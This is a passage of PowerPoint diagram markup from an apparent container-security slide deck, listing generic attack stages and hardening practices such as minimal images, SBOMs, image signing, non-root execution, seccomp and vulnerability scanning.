            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0" dirty="0" err="1">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>cron</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" b="0" i="0" kern="1200" baseline="0" dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t> jobs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6849726" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5D90A522-EDB5-8B4E-BB41-2848D8232500}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6960518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5A95-3D59-A04B-B4E2-E577BAFBCC1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8560919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Exfiltration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>
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Steal secrets, credentials, or data from volumes or APIs.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8560919" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{711E0870-95E2-314F-9CA4-36D864FC39D2}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8671711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54FAC-E001-7F4A-9639-7C1E1563BF79}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10272111" y="0"/>
          <a:ext cx="1661352" cy="43236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Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Lateral Movement</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2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 dirty="0">
              <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
            </a:rPr>
            <a:t>Move to other containers or host via network access.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0">
            <a:latin typeface="Equip" panose="02000503030000020004" pitchFamily="2" charset="77"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="10272111" y="1729450"/>
        <a:ext cx="1661352" cy="1729450"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F2A39681-E09F-1D49-B634-73AFB1F67C8A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="10382904" y="259417"/>
          <a:ext cx="1439767" cy="1439767"/>
        </a:xfrm>
        <a:prstGeom prst="ellipse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17E81-A875-B341-A6BC-6AF39FD09B8F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="477536" y="3458900"/>
          <a:ext cx="10983345" cy="64854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91215-5240-494A-A232-537391B2A90E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="30803"/>
          <a:ext cx="1051864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Image build time</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32384" y="63187"/>
        <a:ext cx="10453880" cy="598621"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D6D0431-3EA8-5E42-A0E0-50F6392B7D4D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="694193"/>
          <a:ext cx="10518648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67" tIns="26670" rIns="149352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 dirty="0"/>
            <a:t>Use multistage builds; keep final image minimal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/>
            <a:t>Pin dependency versions, build reproducibly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 dirty="0"/>
            <a:t>Generate SBOMs and attach to image (use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>syft</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t> - </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>https://</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>github.com</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>anchore</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-GB" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>syft</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="2100" kern="1200" dirty="0"/>
            <a:t>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100" kern="1200"/>
            <a:t>Sign images (cosign) and use image provenance</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="694193"/>
        <a:ext cx="10518648" cy="1425195"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{18EF3945-9971-B946-AA87-23CEA3855FD0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2119388"/>
          <a:ext cx="10518648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 dirty="0"/>
            <a:t>Runtime</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="32384" y="2151772"/>
        <a:ext cx="10453880" cy="598621"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F0FA6F6-5C54-284A-A17B-56A51AA6905C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2782778"/>
          <a:ext cx="10518648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967" tIns="24130" rIns="135128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Run as non-root (USER) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>USER 1001</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0"/>
            <a:t>, read-only root FS </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>ro</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="14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Drop Linux capabilities (drop ALL, add only what's needed) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" b="0" i="1" kern="1200" dirty="0"/>
            <a:t>drop ALL; add NET_BIND_SERVICE</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1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Use seccomp / </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0" err="1"/>
            <a:t>AppArmor</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0"/>
            <a:t> profiles </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>docker run –security-opt seccomp=</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>profile.json</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t> </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>myimage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" i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Limit resource usage; use network policies and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0" err="1"/>
            <a:t>PodSecurityPolicy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1900" kern="1200" dirty="0"/>
            <a:t> alternatives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Mount secrets with least privilege (avoid env vars for long-lived secrets) </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0"/>
            <a:t>:</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1400" i="1" kern="1200" dirty="0" err="1"/>
            <a:t>ro</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" i="1" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2782778"/>
        <a:ext cx="10518648" cy="162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7170C-EC18-E94C-858D-76C9C82A2133}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="386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8F733-D4C0-F14C-950B-CB4AE49E3EE4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="386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Scan images in pipeline</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="386"/>
        <a:ext cx="2081784" cy="633865"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6059813E-AEF3-6A45-8360-46859E12E897}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2237917" y="2917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fail on CRITICAL/HIGH (</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1"/>
            <a:t>trivy</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t> image --exit-code 1 </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1"/>
            <a:t>docker.io</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>/</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0" err="1"/>
            <a:t>myapp:latest</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
            <a:t>)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2237917" y="29170"/>
        <a:ext cx="8171002" cy="575678"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DD05A6EF-035A-EE4E-AF1B-E5914F4DF942}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2081784" y="60484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580B2-8F04-C74F-97D2-A1F18532FF99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="634251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70CD-5942-EE4F-B41D-EFDB07A356F6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="634251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Build SBOM &amp; store as artifact</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="634251"/>
        <a:ext cx="2081784" cy="633865"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D5AB6AA6-4404-4443-826A-8387E3CAD5A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2237917" y="663035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dependencies and license info</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2237917" y="663035"/>
        <a:ext cx="8171002" cy="575678"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3AB0CA8-C791-9441-AFBF-4C55D2F987AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2081784" y="1238714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6ADF1-E4D7-6143-BA5A-E092DBD81D0E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1268116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AF90C-B460-5642-A2D7-CECFCBDDDEA9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1268116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Sign images</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1268116"/>
        <a:ext cx="2081784" cy="633865"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EF774A23-D505-894F-BE91-DB0C7E89A7E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2237917" y="129690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 on deploy (cosign verify docker.io/myapp:latest)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2237917" y="1296900"/>
        <a:ext cx="8171002" cy="575678"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{626556BD-3B5E-6845-AD92-F23DB0A3201A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2081784" y="187257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D6731-AE29-2240-B476-CEB1C58506F5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1901982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9AC1-8FAE-B842-8616-B7B984677B22}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1901982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Promote images through repos</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1901982"/>
        <a:ext cx="2081784" cy="633865"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AA133D33-0405-1349-BA3E-AFC446231ADF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2237917" y="1930765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 → staging → prod (immutable tags)</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2237917" y="1930765"/>
        <a:ext cx="8171002" cy="575678"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E3C9D48A-511F-5B45-80D2-160E0710251E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2081784" y="2506444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9FAFA-6C7C-E546-9293-93F99CC110BD}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2535847"/>
          <a:ext cx="104089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F72B8-2853-4E4E-832D-315DD61749D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2535847"/>
          <a:ext cx="2081784" cy="633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Rebuild images frequently</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1700" kern="1200"/>
            <a:t> </a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2535847"/>
        <a:ext cx="2081784" cy="633865"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3A45EEAD-2779-BC45-824F-44FE0DE4C526}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2237917" y="2564630"/>
          <a:ext cx="8171002" cy="575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pick up upstream security fixes</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2237917" y="2564630"/>
        <a:ext cx="8171002" cy="575678"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{823F416E-0797-144E-9058-C552342365D4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2081784" y="3140309"/>
          <a:ext cx="8327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2C13A-D2BA-6544-9629-1C4241A7FF78}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="8819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Start with </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="2100" b="1" kern="1200"/>
            <a:t>minimal base images</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25188" y="113381"/>
        <a:ext cx="11444939" cy="465594"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5CC6C857-DD17-D242-A03C-BC81066474FB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="60416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distroless or Alpine or Slim</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="604163"/>
        <a:ext cx="11495315" cy="347760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E4D4CCB8-F03F-3240-B7D9-FAAA915218C9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="95192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Remove unnecessary shells &amp; package managers</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25188" y="977111"/>
        <a:ext cx="11444939" cy="465594"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{685AEA87-2719-8341-A678-0C2BCD2E48C0}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="146789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reduce attack surface</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="1467893"/>
        <a:ext cx="11495315" cy="347760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CBA5556A-9182-3A42-9CAD-1B18E74E63AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="181565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Scan &amp; patch vulnerabilities </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="2100" b="1" kern="1200"/>
            <a:t>before deployment </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25188" y="1840841"/>
        <a:ext cx="11444939" cy="465594"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{434A9C7F-273F-EA4A-830C-82B7CBA9F6CC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="233162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Use scanning tools like </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="1600" b="1" kern="1200"/>
            <a:t>trivy, grype, docker-scout</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="2331623"/>
        <a:ext cx="11495315" cy="347760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C0C607F-4782-BE47-A489-C91E8E7670BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2679383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Enforce </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-IN" sz="2100" b="1" kern="1200"/>
            <a:t>runtime restrictions</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25188" y="2704571"/>
        <a:ext cx="11444939" cy="465594"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6A4097BF-895B-AF41-A48C-A9FF9F99C32E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3195352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non-root, seccomp, drop capabilities</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="3195352"/>
        <a:ext cx="11495315" cy="347760"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{68F3EABC-E254-2F4D-B586-73955AFD53F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="3543112"/>
          <a:ext cx="11495315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Monitor &amp; alert</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="25188" y="3568300"/>
        <a:ext cx="11444939" cy="465594"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{08BAF6B0-7AE2-2C4D-868B-41D14A413946}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4059083"/>
          <a:ext cx="1149531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97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/>
            <a:t>suspicious behavior in logs or metrics</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1600" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="0" y="4059083"/>
        <a:ext cx="11495315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E85F-EF3B-7A43-BCC9-C93950E351C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510D-3495-0A4F-A965-AAFCB6FD1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9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B4B5-3304-EE60-F53C-F3A19BF5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13F72-7A35-2A59-F337-82112E5CE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DF4DA-4058-E8BE-0CEF-6736626E2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41893-A6F2-D3F5-E29B-5476A453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88C7F-4ACF-A702-D849-108DEAD48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E9D0C-0AFC-EE9D-1B32-E836ADD8C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9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56AB0-1CFD-4C6D-083A-EE2F8C98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0874C-D9A0-CDAB-F6DD-83CCD0883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BD1D0-1AF2-B842-3408-CB7AD0589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0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2D33B-679D-88D1-864C-88496460A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C966C-1A2E-4E62-7CCF-A26C21CAB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06FC6-2D7B-B632-E233-99F316DFD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8117-1DE8-A0DE-6C09-64450602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B9379-044A-05C4-8159-C12896FB6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EC835-8F4B-A342-7A14-339B9C893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988F4-8AE2-5565-29D3-BE344FFE7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A0B60-A848-47CC-A7AD-1C6F02C6C71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76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B385-07D6-3371-3CB6-FC4E257FB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911A55-0C13-CA54-4A62-7455D2DF1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40E0A-27DC-282F-2FBB-B33FF02DE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79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CFFD-493F-C9DF-9664-2A6BFB36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4CDBED-5B83-2862-10E0-A5DD25842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0C48-2AC2-6BD6-0629-9D3B97779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2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C662-7DC0-1B8A-BB4C-0AF24DFD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180CF-AB91-F0C6-A2DA-D5BA9328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C6A2-03AB-2961-7D16-E1AF43ED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C2C7-DD04-D19E-7062-2CD6F254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34F7-8D34-72E9-FCF2-E055A714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1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1C35-1F9A-EE68-EA68-9682B966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E769A-E466-3C66-1B6E-5F5AD1B0E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21114-0F0B-6994-CCE7-1E09F17C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EDF3-1CD3-2362-EA65-4D57F09E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E69B-1BC6-FF62-97E3-9613EB96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8EBBD-7655-B775-58DC-77ABFF993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92771-7776-2E8A-AB44-D7566600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622A-3C35-C16D-265E-67B4AC1C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DF661-B928-7764-B26A-620E5C81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3189-87B4-B328-66CB-65E95967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2_Section Small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A3534EE-6057-4046-A7C6-1E86CE23A4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9767782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A180E1-0906-AF4F-AD8C-D37F88FAE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20" y="2907906"/>
            <a:ext cx="9767782" cy="797078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lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="5400" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="bg1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DF32DB2-7359-CA47-9D2B-FC2E95C76A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9386" y="4047725"/>
            <a:ext cx="9767782" cy="462998"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="108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Equip Extended Thin" panose="02000503030000020004" pitchFamily="2" charset="77"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>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56704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A2FAD0F-C7E7-9E43-B2FB-56A6A8BFFE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0B82C9C-213C-5846-9418-2E92489F1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6"/>
            <a:ext cx="6947999" cy="48820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8E9BFF-AA50-5A4B-879E-3AC820AF497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2" y="930189"/>
            <a:ext cx="6947999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987E3FA-762E-1544-B600-DE2358F40A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4972" y="2436204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092923F0-4DAD-D047-919F-E9C087D11A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4975" y="2112111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45C7B623-9A59-0344-A47A-44FFD3513C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9997" y="2112111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620F14B5-2346-794D-A8B4-1F98C21619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07773" y="2439713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42B3E1EA-2B2A-D940-AB24-C21760A18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7776" y="2115620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2611E22-EC7A-6241-A2EC-B60647BB1C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82798" y="2115620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F05CA85-D18E-4E47-ABF8-DCB282EA2C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4972" y="3522053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995747D0-5830-3744-BAA3-C30717BDA2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4975" y="3197961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6EB72F02-CCB0-8245-97D7-1763619B80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9997" y="3197961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C02FA8C-0B1C-A64D-9151-9D133023AD3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7773" y="3525563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0B48CBAC-5DBC-A84D-A3CE-6DCD8B5C82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07776" y="3201470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4A8F5CB8-6C44-3048-8271-CBD6BA8FBE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82798" 